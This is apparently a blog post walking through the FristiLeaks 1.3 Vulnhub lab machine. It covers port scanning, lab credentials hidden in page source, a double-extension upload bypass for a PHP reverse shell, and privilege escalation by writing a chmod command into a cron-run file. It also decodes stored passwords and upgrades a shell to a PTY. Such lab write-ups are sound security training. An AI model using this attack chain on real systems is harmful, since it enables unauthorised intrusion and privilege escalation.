Tuesday, October 8, 2019

Vulnhub: FristiLeaks: 1.3

source: https://www.vulnhub.com/entry/fristileaks-13,133/

192.168.1.24

nmap:
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

maybe centos 6.8

nikto:
/cola
/sisi
/beer
/robots.txt
/icons
/images
/icons/README

login page: http://192.168.1.24/fristi/

from source code:
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

 and two base64-encoded pictures.
username eezeepz, password keKkeKKeKKeKkEkkEk
upload bypass:

rename rs.php to rs.php.png

centos 6.7
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash

fristi:x:503:100::/var/www:/sbin/nologin

 cat /var/www/notes.txt hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry

 cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

privilege escalation:
echo “/home/admin/chmod -R 777 /home/admin” > /tmp/runthis
cd /home/admin
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
cat cryptpass.py
rot13 decode->reverse->base64 decode

mVGZ3O3omkJLmy2pcuTq->thisisalsopw123
=RFn0AKnlMHMPIzpyuTI0ITG->LetThereBeFristi!
username fristigod, password LetThereBeFristi!

switch to tty:
python -c "import pty; pty.spawn('/bin/bash')"






head /var/www/html/fristi/checklogin.php
<?php

ob_start();
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name
Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)